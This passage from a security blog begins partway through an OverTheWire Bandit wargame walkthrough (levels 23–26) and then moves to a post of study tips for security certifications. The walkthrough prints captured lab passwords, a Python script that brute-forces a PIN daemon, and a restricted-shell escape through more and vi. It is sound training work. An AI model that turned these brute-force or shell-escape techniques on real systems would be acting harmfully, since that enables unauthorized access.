bandit23@melinda:~$ chmod +x /run/lock/bandit24pwd.sh
bandit23@melinda:~$ cp /run/lock/bandit24pwd.sh /var/spool/bandit24
bandit23@melinda:~$ ls /var/spool/bandit24
bandit24pwd.sh script.sh
bandit23@melinda:~$ ls /run/lock
bandit24pwd.sh hello password
bandit23@melinda:~$ cat /run/lock/password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ


Level 24 to 25

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

bandit24@melinda:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 1111
Wrong! Please enter the correct pincode. Try again.

This looks like a good application for Python.

pin.py

#!/usr/bin/env python
import socket
password = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ "
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Sending: password and pin...\n"
sock.connect(('localhost', 30002))
data = sock.recv(1024)
for x in range(0,10000):
    sock.send(password + str(x).zfill(4) + "\n")
    data = sock.recv(1024)
    if not "Wrong!" in data:
    print data

bandit24@melinda:/var/lock$ python pin.py
Sending: password and pin…

Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.


Level 25 to 26

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

I ssh to bandit26:
bandit25@melinda:~$ ssh -i bandit26.sshkey bandit26@localhost

I’m immediately logged out. Let’s checkout the shell for bandit26.
bandit25@melinda:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

The shell for bandit26 is /usr/bin/showtext:
bandit25@melinda:~$ cat /usr/bin/showtext
#!/bin/sh
more ~/text.txt
exit 0

In order to get more to pause and not exit, I reduced my terminal window size to 5 lines.

I ssh in again and more is activated. Reading up on more, I find that when paused you can enter the “v” character to enter vi. Once in the vi shell you can read a file with “:r </path/to/file>”.

_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| ‘_ \ / _` | ‘_ \ / _` | | __| / / ‘_ \
:r /etc/bandit_pass/bandit26

I pressed the spacebar eleven times to page with more and see the password:
_ _ _ _ ___ __
5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_


Level 26 to 27

At this moment, level 27 does not exist yet.

 

Hacking the Learning Process

Working in information security sometimes feels like drinking from the ocean through a fire hose. The more I learn, the more I feel like a newb and realize that I’ve only found the tip of the iceberg. It takes a lot of passion for the subject to keep studying and doing hands-on labs day after day without burning out.

The idea for this post came to me when I recently answered a Reddit post asking about how we learn about security. There’s so much to learn that many people don’t know where to start because it can be overwhelming. In my case I have a hard time staying on track once I start learning something because I keep finding another thread to pull and start unraveling the fabric of a related subject.

I’m going to share what’s worked for me over the years that I’ve served in the military and worked in IT. Over 20 years ago I was an Undesignated Airman in the Navy, meaning I didn’t have a formal training school for a rating (or MOS in other branches). In order to take the test for Aviation Electrician I had to digest a stack of books called the Navy Electrical and Electronic Training Series (NEETS) that was about a foot tall. Through the years I had to study an even larger stack of manuals to be advanced in rank. After the Navy, the study habits that I am going to outline here helped me to earn various IT and security certifications including OSCP, OSWP, CCNA, CCA, and Security+.

Start with a written plan. In the case of information security, there are so many things to learn that it’s easy to feel overwhelmed. Think about your knowledge and skills gaps and write down your plan of study. If you’re working on a certification, decide how long you think it will take to cover each section of the study guide and set an exam date. Book the exam right away. The sense of impending doom will help you to stay on track. If something comes up that delays taking the exam you can usually cancel or reschedule if you contact the testing center in advance.

While studying, find a quiet place where you can read out loud without bothering anyone. I’ve found that reading out loud leads to better memory retention, most likely because of the increase in neural connections required to speak it vs. only think it.

For memorization write out flash cards. Again, the extra step of writing it down seems to lead to better memory retention vs. only reading it silently. As you flip through the stack of flash cards, remove any cards from the stack that you can easily answer. This leaves the more difficult cards that will be reviewed more often. Repeat the process of reviewing the stack, removing cards that you can easily answer until you have removed every card. Then repeat the process by reviewing the whole stack again.

For hands-on learning, write a lesson plan as if you’re going to teach the subject to a complete beginner. Create a PowerPoint presentation with screenshots as well as any commands that need to be run to use for the next step. Finally, install screen cast software and record your screen and voice while giving your presentation. While you review the video it will be easy to spot where you had problems or things went awry. Work through the issues to refine your presentation and then create a new screen cast. When I’m working in VMware doing security labs to learn new things I like to put screenshots and commands to run in Microsoft OneNote and use those notes on a second screen to work through my screen casts. If you work in a role that presents to customers or groups, a screen cast or web cast can help you to refine your speech and visual presentation. Recording screen casts is something I’ve only recently starting doing in order to prepare presentations for a local security meetup group.

What are your tips to hack the learning process?